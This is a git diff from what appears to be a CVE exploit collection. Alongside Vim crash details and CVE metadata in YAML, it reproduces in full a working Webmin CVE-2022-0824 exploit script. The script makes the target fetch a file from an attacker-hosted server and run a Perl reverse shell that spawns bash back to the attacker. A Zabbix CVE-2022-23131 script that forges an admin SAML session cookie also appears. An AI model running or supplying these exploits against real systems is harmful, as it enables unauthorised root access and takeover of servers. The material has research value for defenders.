0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 ◂— ... 
+05:0028│ 0x7fffffffb478 —▸ 0x555555638d0c (unputcmdline+101) ◂— mov edx, eax
+06:0030│ 0x7fffffffb480 —▸ 0x7fffffffb540 —▸ 0x7fffffffb5a0 —▸ 0x7fffffffb5c0 —▸ 0x7fffffffb5f0 ◂— ...
+07:0038│ 0x7fffffffb488 —▸ 0x55555565e74b (vgetorpeek+3187) ◂— jmp 0x55555565e752
+───────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────
+ ► f 0 0x555555699519 utfc_ptr2len+20
+ f 1 0x555555638d0c unputcmdline+101
+ f 2 0x55555565e74b vgetorpeek+3187
+ f 3 0x55555565b8a6 vgetc+250
+ f 4 0x55555565bf9e safe_vgetc+17
+ f 5 0x5555556aec0f get_number+126
+ f 6 0x5555556aedd7 prompt_for_number+115
+ f 7 0x55555578f2b8 spell_suggest+2101
+```
+
+[PoC](https://raw.githubusercontent.com/khoanguyenxuan/testing/main/poc.dat)
+
+## Impact
+
 NULL Pointer Dereference in function utfc_ptr2len allows attackers to cause a denial of service (application crash) via a crafted input.
\ No newline at end of file
diff --git a/cve/vim/2023/yaml/CVE-2023-0288.yaml b/cve/vim/2023/yaml/CVE-2023-0288.yaml
index 08329eac..92997801 100644
--- a/cve/vim/2023/yaml/CVE-2023-0288.yaml
+++ b/cve/vim/2023/yaml/CVE-2023-0288.yaml
@@ -1,19 +1,19 @@ -id: CVE-2023-0288 -source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/ -info: - name: Vim是一款基于UNIX平台的编辑器。 - severity: high - description: | - GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。 - scope-of-influence: - vim < 9.0.1182 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-0288 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-0288 - cwe-id: CWE-122 - cnvd-id: None - kve-id: None +id: CVE-2023-0288 +source: https://huntr.dev/bounties/550a0852-9be0-4abe-906c-f803b34e41d3/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + GitHub存储库vim/vim在9.0.1182版本存在堆buffer溢出漏洞。 + scope-of-influence: + vim < 9.0.1182 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0288 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0288 + cwe-id: CWE-122 + cnvd-id: None + kve-id: None tags: cve2023, 堆buffer溢出漏洞 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-0512.yaml b/cve/vim/2023/yaml/CVE-2023-0512.yaml index d0060dc5..43291f7a 100644 --- a/cve/vim/2023/yaml/CVE-2023-0512.yaml +++ b/cve/vim/2023/yaml/CVE-2023-0512.yaml 
@@ -1,19 +1,19 @@ -id: CVE-2023-0512 -source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/ -info: - name: Vim是一款基于UNIX平台的编辑器。 - severity: high - description: | - vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。 - scope-of-influence: - vim < 9.0.1247 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-0512 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.8 - cve-id: CVE-2023-0512 - cwe-id: CWE-369 - cnvd-id: None - kve-id: None +id: CVE-2023-0512 +source: https://huntr.dev/bounties/de83736a-1936-4872-830b-f1e9b0ad2a74/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim软件包的src/move.c文件中adjust_skipcol()函数存在除以0的浮点异常问题,该漏洞可导致程序崩溃、数据出错等。 + scope-of-influence: + vim < 9.0.1247 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-0512 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2023-0512 + cwe-id: CWE-369 + cnvd-id: None + kve-id: None tags: cve2023, 除零错误 \ No newline at end of file diff --git a/cve/vim/2023/yaml/CVE-2023-1264.yaml b/cve/vim/2023/yaml/CVE-2023-1264.yaml index 569d8a34..6669ae9c 100644 --- a/cve/vim/2023/yaml/CVE-2023-1264.yaml +++ b/cve/vim/2023/yaml/CVE-2023-1264.yaml 
@@ -1,20 +1,20 @@ -id: CVE-2023-1264 -source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/ -info: - name: Vim是一款基于UNIX平台的编辑器。 - severity: medium - description: | - NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392. - scope-of-influence: - vim < 9.0.1392 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2023-1264 - - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6 - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H - cvss-score: 5.5 - cve-id: CVE-2023-1264 - cwe-id: CWE-476 - cnvd-id: None - kve-id: None +id: CVE-2023-1264 +source: https://huntr.dev/bounties/b2989095-88f3-413a-9a39-c1c58a6e6815/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: medium + description: | + NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.1392. + scope-of-influence: + vim < 9.0.1392 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-1264 + - https://github.com/vim/vim/commit/7ac5023a5f1a37baafbe1043645f97ba3443d9f6 + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H + cvss-score: 5.5 + cve-id: CVE-2023-1264 + cwe-id: CWE-476 + cnvd-id: None + kve-id: None tags: cve2023, 空指针解引用 \ No newline at end of file diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml index 94ff4774..594d11ac 100644 --- a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml +++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml 
@@ -1,23 +1,23 @@ -id: CVE-2020-14882 -source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py -info: - name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 - severity: critical - description: | - CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台 - scope-of-influence: - weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 - reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-14882 - https://www.oracle.com/security-alerts/cpuoct2020.html - http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html - http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html - http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-14882 - cwe-id: None - cnvd-id: None - kve-id: None +id: CVE-2020-14882 +source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py +info: + name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 + reference: + https://nvd.nist.gov/vuln/detail/CVE-2020-14882 + https://www.oracle.com/security-alerts/cpuoct2020.html + http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html + http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html + http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html + classification: + cvss-metrics: 
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14882 + cwe-id: None + cnvd-id: None + kve-id: None tags: cve2020, Weblogic \ No newline at end of file diff --git a/cve/webmin/2022/CVE-2022-0824/README.md b/cve/webmin/2022/CVE-2022-0824/README.md old mode 100755 new mode 100644 index 7b23df28..9b20e2be --- a/cve/webmin/2022/CVE-2022-0824/README.md +++ b/cve/webmin/2022/CVE-2022-0824/README.md 
@@ -1,58 +1,58 @@ -# Webmin-CVE-2022-0824-revshell - - -## Vulnerability Description - -Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) -Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. -_Source: https://www.webmin.com/security.html_ - -## Exploit Description - -This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges. 
- -_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_ - -## Usage - - $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT] - $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444 - - $~ python3 Webmin-revshell.py -h - usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V] - - Webmin CVE-2022-0824 Reverse Shell - - optional arguments: - -h, --help show this help message and exit - -t TARGET, --target TARGET - Target full URL, https://www.webmin.local:10000 - -c CREDENTIAL, --credential CREDENTIAL - Format, user:user123 - -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER - Http server for serving payload, ex 192.168.5.120:8080 - -L CALLBACK_IP, --callback_ip CALLBACK_IP - Callback IP to receive revshell - -P CALLBACK_PORT, --callback_port CALLBACK_PORT - Callback port to receive revshell - -V, --version show program's version number and exit - -## PoC - - target host: https://192.168.5.118:10000 - attacker host: 192.168.5.120 - - -https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4 - - -## Tested on - - - Webmin 1.984 - - Ubuntu 18.04 - - Kali 2021.3 - - -## Disclaimer: - - The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities +# Webmin-CVE-2022-0824-revshell + + +## Vulnerability Description + +Webmin 1.984 and below - File Manager privilege exploit (CVE-2022-0824 and CVE-2022-0829) +Less privileged Webmin users who do not have any File Manager module restrictions configured can access files with root privileges, if using the default Authentic theme. All systems with additional untrusted Webmin users should upgrade immediately. 
Note that Virtualmin systems are not effected by this bug, due to the way domain owner Webmin users are configured. +_Source: https://www.webmin.com/security.html_ + +## Exploit Description + +This exploit takes advantage of the post-auth Improper Access Control vulnerability in File Manager. This exploit could be done by any less privileged authenticated attacker. It will download a .cgi file remotely from an attacker-controlled server and modify its permission to be a world-executables file. Once this is done, it will execute the .cgi file to establish a reverse connection to the attacker-controller server with root privileges. + +_Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/_ + +## Usage + + $~ python3 Webmin-revshell.py -t [TARGET] -c [CREDENTIAL] -LS [PY3HTTP_SERVER] -L [CALLBACK_IP] -P [CALLBACK_PORT] + $~ python3 Webmin-revshell.py -t https://192.168.5.118:10000 -c user:user123 -LS 192.168.5.120:9090 -L 192.168.5.120 -P 4444 + + $~ python3 Webmin-revshell.py -h + usage: Webmin-revshell.py [-h] -t TARGET -c CREDENTIAL -LS PY3HTTP_SERVER -L CALLBACK_IP -P CALLBACK_PORT [-V] + + Webmin CVE-2022-0824 Reverse Shell + + optional arguments: + -h, --help show this help message and exit + -t TARGET, --target TARGET + Target full URL, https://www.webmin.local:10000 + -c CREDENTIAL, --credential CREDENTIAL + Format, user:user123 + -LS PY3HTTP_SERVER, --py3http_server PY3HTTP_SERVER + Http server for serving payload, ex 192.168.5.120:8080 + -L CALLBACK_IP, --callback_ip CALLBACK_IP + Callback IP to receive revshell + -P CALLBACK_PORT, --callback_port CALLBACK_PORT + Callback port to receive revshell + -V, --version show program's version number and exit + +## PoC + + target host: https://192.168.5.118:10000 + attacker host: 192.168.5.120 + + +https://user-images.githubusercontent.com/51811615/156904265-80c2ee4f-8447-41cd-9197-446bf6555e25.mp4 + + +## Tested on + + - Webmin 1.984 + - Ubuntu 18.04 + - Kali 2021.3 + + +## Disclaimer: + + The 
script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities diff --git a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py old mode 100755 new mode 100644 index 2f27a1d2..cde6a67e --- a/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py +++ b/cve/webmin/2022/CVE-2022-0824/Webmin-revshell.py 
@@ -1,146 +1,146 @@ -#!/usr/bin/python3 - -""" -Coded by: @faisalfs10x -GitHub: https://github.com/faisalfs10x -Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ -""" - -import requests -import urllib3 -import argparse -import os -import time - -urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) - -TGREEN = '\033[32m' -TRED = '\033[31m' -TCYAN = '\033[36m' -TSHELL = '\033[32;1m' -ENDC = '\033[m' - -class Exploit(object): - def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): - self.target = target - self.username = username - self.password = password - self.py3http_server = py3http_server - self.pyhttp_port = pyhttp_port - self.upload_path = upload_path - self.callback_ip = callback_ip - self.callback_port = callback_port - self.fname = fname - - #self.proxies = proxies - self.s = requests.Session() - - - def gen_payload(self): - payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') - print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) - f = open(f"{self.fname}", "w") - f.write(payload) - f.close() - - def login(self): - login_url = self.target + "/session_login.cgi" - cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } - - data = { 'user' : self.username, 'pass' : self.password } - try: - r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) - success_message = 'System hostname' - if success_message in r.text: - print(TGREEN + "[+] Login Successful", ENDC) - else: - print(TRED +"[-] Login Failed", ENDC) - exit() - - except requests.Timeout as e: - print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", 
ENDC) - exit() - - def pyhttp_server(self): - print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') - os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up - print('[+] Sleep 3 second to ensure http server is up!') - time.sleep(3) # Sleep for 5 seconds to ensure http server is up! - - def download_remote_url(self): - download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" - headers = { - "Accept": "application/json, text/javascript, */*; q=0.01", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", - "X-Requested-With": "XMLHttpRequest", - "Referer": self.target + "/filemin/?xnavigation=1" - } - - data = { - 'link': "http://" + self.py3http_server + "/" + self.fname, - 'username': '', - 'password': '', - 'path': self.upload_path - } - - r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) - print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") - - def modify_permission(self): - modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" - headers = { "Referer": self.target + "/filemin/?xnavigation=1" } - data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } - - r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) - print(f"[+] Modifying permission of {self.fname} to 0755") - - def exec_revshell(self): - url = self.target + '/' + self.fname - try: - r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) - except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! 
- print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) - print("[+] Shell location: " + url) - else: - print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) - - def do_cleanup(self): - print(TCYAN + '\n[+] Cleaning up ') - print(f'[+] Killing: http.server on port {self.pyhttp_port}') - os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') - exit() - - def run(self): - self.gen_payload() - self.login() - self.pyhttp_server() - self.download_remote_url() - self.modify_permission() - self.exec_revshell() - self.do_cleanup() - - -if __name__ == "__main__": - - parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') - parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') - parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') - parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') - parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') - parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') - parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') - args = parser.parse_args() - - target = args.target - username = args.credential.split(':')[0] - password = args.credential.split(':')[1] - py3http_server = args.py3http_server - pyhttp_port = py3http_server.split(':')[1] - callback_ip = args.callback_ip - callback_port = args.callback_port - upload_path = "/usr/share/webmin" - fname = "revshell.cgi" - - pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) +#!/usr/bin/python3 + +""" +Coded by: @faisalfs10x +GitHub: https://github.com/faisalfs10x 
+Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/ +""" + +import requests +import urllib3 +import argparse +import os +import time + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +TGREEN = '\033[32m' +TRED = '\033[31m' +TCYAN = '\033[36m' +TSHELL = '\033[32;1m' +ENDC = '\033[m' + +class Exploit(object): + def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname): + self.target = target + self.username = username + self.password = password + self.py3http_server = py3http_server + self.pyhttp_port = pyhttp_port + self.upload_path = upload_path + self.callback_ip = callback_ip + self.callback_port = callback_port + self.fname = fname + + #self.proxies = proxies + self.s = requests.Session() + + + def gen_payload(self): + payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''') + print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC) + f = open(f"{self.fname}", "w") + f.write(payload) + f.close() + + def login(self): + login_url = self.target + "/session_login.cgi" + cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" } + + data = { 'user' : self.username, 'pass' : self.password } + try: + r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10) + success_message = 'System hostname' + if success_message in r.text: + print(TGREEN + "[+] Login Successful", ENDC) + else: + print(TRED +"[-] Login Failed", ENDC) + exit() + + except requests.Timeout as e: + print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC) + exit() + + def pyhttp_server(self): + print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n') + 
os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up + print('[+] Sleep 3 second to ensure http server is up!') + time.sleep(3) # Sleep for 5 seconds to ensure http server is up! + + def download_remote_url(self): + download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin" + headers = { + "Accept": "application/json, text/javascript, */*; q=0.01", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With": "XMLHttpRequest", + "Referer": self.target + "/filemin/?xnavigation=1" + } + + data = { + 'link': "http://" + self.py3http_server + "/" + self.fname, + 'username': '', + 'password': '', + 'path': self.upload_path + } + + r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True) + print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}") + + def modify_permission(self): + modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30" + headers = { "Referer": self.target + "/filemin/?xnavigation=1" } + data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path } + + r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True) + print(f"[+] Modifying permission of {self.fname} to 0755") + + def exec_revshell(self): + url = self.target + '/' + self.fname + try: + r = self.s.get(url, verify=False, allow_redirects=True, timeout=3) + except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned! 
+ print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC) + print("[+] Shell location: " + url) + else: + print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC) + + def do_cleanup(self): + print(TCYAN + '\n[+] Cleaning up ') + print(f'[+] Killing: http.server on port {self.pyhttp_port}') + os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})') + exit() + + def run(self): + self.gen_payload() + self.login() + self.pyhttp_server() + self.download_remote_url() + self.modify_permission() + self.exec_revshell() + self.do_cleanup() + + +if __name__ == "__main__": + + parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell') + parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000') + parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123') + parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080') + parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell') + parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell') + parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0') + args = parser.parse_args() + + target = args.target + username = args.credential.split(':')[0] + password = args.credential.split(':')[1] + py3http_server = args.py3http_server + pyhttp_port = py3http_server.split(':')[1] + callback_ip = args.callback_ip + callback_port = args.callback_port + upload_path = "/usr/share/webmin" + fname = "revshell.cgi" + + pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname) pwn.run() \ No newline at end of file 
diff --git a/cve/webmin/2022/yaml/CVE-2022-0824.yaml b/cve/webmin/2022/yaml/CVE-2022-0824.yaml old mode 100755 new mode 100644 index 759b4b56..691f234f --- a/cve/webmin/2022/yaml/CVE-2022-0824.yaml +++ b/cve/webmin/2022/yaml/CVE-2022-0824.yaml @@ -1,20 +1,20 @@ -id: CVE-2022-0824 -source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell -info: - name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。 - severity: high - description: | - 在GitHub仓库webmin/webmin 1.990之前,访问控制不当导致远程代码执行。 - scope-of-influence: - webmin < 1.990 - reference: - - https://nvd.nist.gov/vuln/detail/cve-2022-0824 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2022-0824 - cwe-id: CWE-863, CWE-284 - cnvd-id: None - kve-id: None - tags: cve2022, RCE +id: CVE-2022-0824 +source: https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell +info: + name: Webmin是用于类Unix系统的基于Web的服务器管理控制面板。 + severity: high + description: | + 在GitHub仓库webmin/webmin 1.990之前,访问控制不当导致远程代码执行。 + scope-of-influence: + webmin < 1.990 + reference: + - https://nvd.nist.gov/vuln/detail/cve-2022-0824 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2022-0824 + cwe-id: CWE-863, CWE-284 + cnvd-id: None + kve-id: None + tags: cve2022, RCE \ No newline at end of file diff --git a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py index 881c7d68..93756db1 100644 --- a/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py +++ b/cve/zabbix/2022/CVE-2022-23131/CVE-2022-23131.py 
@@ -1,37 +1,37 @@ -import requests -import re -import urllib.parse -import base64 -import json -import sys - -def exp(target, username): - resp = requests.get(url=target, verify=False) - cookie = resp.headers.get("Set-Cookie") - - zbx_session = re.findall(r"zbx_session=(.*?); ", cookie) - - url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') - base64_decode_data = base64.b64decode(url_decode_data) - - decode_to_str = str(base64_decode_data, encoding='utf-8') - - to_json = json.loads(decode_to_str) - - tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"]) - - payloadJson = json.dumps(tmp_ojb) - print("decode_payload:", payloadJson) - - payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) - print("zbx_signed_session:", payload) - - -if __name__ == "__main__": - if len(sys.argv) != 3: - print("argv error") - exit(0) - target = sys.argv[1] - username = sys.argv[2] - +import requests +import re +import urllib.parse +import base64 +import json +import sys + +def exp(target, username): + resp = requests.get(url=target, verify=False) + cookie = resp.headers.get("Set-Cookie") + + zbx_session = re.findall(r"zbx_session=(.*?); ", cookie) + + url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8') + base64_decode_data = base64.b64decode(url_decode_data) + + decode_to_str = str(base64_decode_data, encoding='utf-8') + + to_json = json.loads(decode_to_str) + + tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"]) + + payloadJson = json.dumps(tmp_ojb) + print("decode_payload:", payloadJson) + + payload = urllib.parse.quote(base64.b64encode(payloadJson.encode())) + print("zbx_signed_session:", payload) + + +if __name__ == "__main__": + if len(sys.argv) != 3: + print("argv error") + exit(0) + target = sys.argv[1] + username = sys.argv[2] + exp(target, username) \ No newline at end of file 
diff --git a/cve/zabbix/2022/CVE-2022-23131/README.md b/cve/zabbix/2022/CVE-2022-23131/README.md index bd13b10a..4fabab8c 100644 --- a/cve/zabbix/2022/CVE-2022-23131/README.md +++ b/cve/zabbix/2022/CVE-2022-23131/README.md @@ -1,4 +1,4 @@ -CVE-2022-23131 -使用方式:python3 CVE-2022-23131.py target Admin -其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面 - +CVE-2022-23131 +使用方式:python3 CVE-2022-23131.py target Admin +其中,target为目标地址 Admin固定为管理员用户名。将生成的zbx_signed_session替换到当前目标的cookie中 点击登陆页面的sign in with Single Sign-On (SAML)方式登陆,即可直接进入管理界面 + diff --git a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml b/cve/zabbix/2022/yaml/CVE-2022-23131.yaml deleted file mode 100644 index 0eab256c..00000000 --- a/cve/zabbix/2022/yaml/CVE-2022-23131.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2022-23131 -source: - https://github.com/L0ading-x/cve-2022-23131 -info: - name: Zabbix 是由 Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。可用于监视各种网络服务、服务器和网络机器等状态。 - severity: critical - description: 在启用 SAML SSO 身份验证(非默认)的情况下,恶意行为者可以修改会话数据,因为存储在会话中的用户登录未经过验证。恶意的未经身份验证的参与者可能会利用此问题来提升权限并获得对 Zabbix Frontend 的管理员访问权限。要执行攻击,需要启用 SAML 身份验证,并且攻击者必须知道 Zabbix 用户的用户名(或使用默认情况下禁用的来宾帐户)。 - scope-of-influence: - Zabbix 5.4.0 – 5.4.8; Zabbix 6.0.0alpha1 - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2022-23131 - - https://www.secpulse.com/archives/179601.html - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2022-23131 - cwe-id: CWE-290 - cnvd-id: None - kve-id: None - tags: 前端认证绕过漏洞 \ No newline at end of file diff --git a/other_list.yaml b/other_list.yaml index fc7663c8..226fdef9 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -29,6 +29,8 @@ cve: - CVE-2021-1056 